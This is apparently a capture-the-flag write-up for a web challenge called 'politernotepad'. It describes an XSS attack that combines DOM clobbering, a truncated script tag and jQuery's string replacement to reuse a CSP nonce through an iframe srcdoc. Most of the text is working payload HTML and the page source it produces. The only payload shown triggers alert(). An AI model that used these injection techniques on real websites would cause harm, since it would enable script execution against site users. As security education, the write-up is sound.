<a id=bad1 href='cid:="</div">'>
<a id=good1 href="cid:></script><iframe srcdoc='$'">
<a id=bad2 href="http://politernotepad.zajebistyc.tf/static/badwords.js">
<a id=good2 href='data:,alert(/greetings from terjanq/)"></script>'>
<a id=bad3><a id=good3>
<a id=bad4><a id=good4>
<script cid:=
Link: http://politernotepad.zajebistyc.tf/note/qLIoyYIVAYaLnrdUYHszqaKmQdaMdG
The injected HTML directly into HTML source code will look like:
<div id="content">
<a id=bad1 href='cid:="</div">'>
<a id=good1 href="cid:></script><iframe srcdoc='$'">
<a id=bad2 href="http://politernotepad.zajebistyc.tf/static/badwords.js">
<a id=good2 href='data:,alert()"></script>'>
<a id=bad3><a id=good3>
<a id=bad4><a id=good4>
<script cid:=
</div>
<script nonce=ltxemCDlbYI2Vt-18xET_g src="http://politernotepad.zajebistyc.tf/static/badwords.js" integrity="sha384-1UV2mnC+iV6gBvv4glb0sAC2atcScwkpEzz5GN3WmVgok8MckQ1yn74acklRk0uo">
</script>
<script nonce=ltxemCDlbYI2Vt-18xET_g>
var footer = 'if you see anything impolite in this page please <a href="'+document.referrer+'">go back</a>';
footer = '<div>'+footer+'</div>';
content = $('#content').html();
content += footer;
content = content.replaceAll(bad1, good1);
content = content.replaceAll(bad2, good2);
content = content.replaceAll(bad3, good3);
content = content.replaceAll(bad4, good4);
console.log(content);
$('#content').html(content);
</script>
- Thanks to the
<script cid:=
at the end, loading a scripthttp://politernotepad.zajebistyc.tf/static/badwords.js
will fail because of enclosing it into a<script>...</script>
. That script defines a few variables:
var bad1 = 'fuck'
var good1 = 'f**k'
var bad2 = 'shit'
var good2 = 's**t'
var bad3 = 'damn'
var good3 = 'd**n'
var bad4 = 'dragon sector'
var good4 = 'p4'
- Because we blocked loading the script, we can now DOM Clobber those properties via
<a id=bad1 href=cid:zzz>
- On the page we can notice that some replacements are made
content = content.replaceAll(bad1, good1);
and the content is reinjected via Jquery.html()
. With clobbering we can replace strings that are valid URLs to something that is a valid URL. - Because we have
<script nonce=ltxemCDlbYI2Vt-18xET_g src="http://politernotepad.zajebistyc.tf/static/badwords.js" integrity="sha384-1UV2mnC+iV6gBvv4glb0sAC2atcScwkpEzz5GN3WmVgok8MckQ1yn74acklRk0uo"> </script>
on the page, we could potentially replacehttp://politernotepad.zajebistyc.tf/static/badwords.js
withdata:,alert()"></script>
to execute a script with removingintegrity
beforehand. Normally executing scripts won't work ininnerHTML
, but jQuery calls_evalUrl
that fetches the response and executes it. Though, this will be blocked by the CSP due todefault-src 'self'
. I haven't also found a way to easily removesrc=
from the script that would prevent that. - Instead of taking advantage of JQuery's script evaluators, we could put our payload inside
<iframe srcdoc='payload'>
with the desired<script nonce="ltxemCDlbYI2Vt-18xET_g" src="data:,alert()"></script>
. - But how to retrieve the nonce?? We can read from the spec that
$'
Inserts the portion of the string that follows the matched substring.. So if we replacecid:="</div">
withcid:></script><iframe srcdoc='$'
and thenhttp://politernotepad.zajebistyc.tf/static/badwords.js
withdata:,alert()
that way we will create the below code that executesalert()
Actually $'
is unnecessary, cid:></script><iframe srcdoc='
will work just fine. That's a leftover from when I needed it in my other attempts
<a id="bad1" href="cid:="</div">">
</a><a id="good1" href="cid:></script><iframe srcdoc='$'">
</a><a id="bad2" href="data:,alert()"></script>">
</a><a id="good2" href="data:,alert()"></script>">
</a><a id="bad3"></a><a id="good3">
</a><a id="bad4"></a><a id="good4">
<script cid:></script><iframe srcdoc='
<script nonce=TPFdWJqbDkzc5ii54br2Sw src="data:,alert()"></script>" integrity="sha384-1UV2mnC+iV6gBvv4glb0sAC2atcScwkpEzz5GN3WmVgok8MckQ1yn74acklRk0uo">
</script>
<script nonce="">
var footer = 'if you see anything impolite in this page please <a href="'+document.referrer+'">go back</a>';
footer = '<div>'+footer+'</div>';
content = $('#content').html();
content += footer;
content = content.replaceAll(bad1, good1);
content = content.replaceAll(bad2, good2);
content = content.replaceAll(bad3, good3);
content = content.replaceAll(bad4, good4);
console.log(content);
$('#content').html(content);
</script></a><div>if you see anything impolite in this page please <a href="http://politernotepad.zajebistyc.tf/add">go back</a></div>
<script nonce=TPFdWJqbDkzc5ii54br2Sw src="data:,alert()"></script>" integrity="sha384-1UV2mnC+iV6gBvv4glb0sAC2atcScwkpEzz5GN3WmVgok8MckQ1yn74acklRk0uo">
</script>
<script nonce="">
var footer = 'if you see anything impolite in this page please <a href="'+document.referrer+'">go back</a>';
footer = '<div>'+footer+'</div>';
content = $('#content').html();
content += footer;
content = content.replaceAll(bad1, good1);
content = content.replaceAll(bad2, good2);
content = content.replaceAll(bad3, good3);
content = content.replaceAll(bad4, good4);
console.log(content);
$('#content').html(content);
</script></a><div>if you see anything impolite in this page please <a href="http://politernotepad.zajebistyc.tf/add">go back</a></div>
👏👏👏👏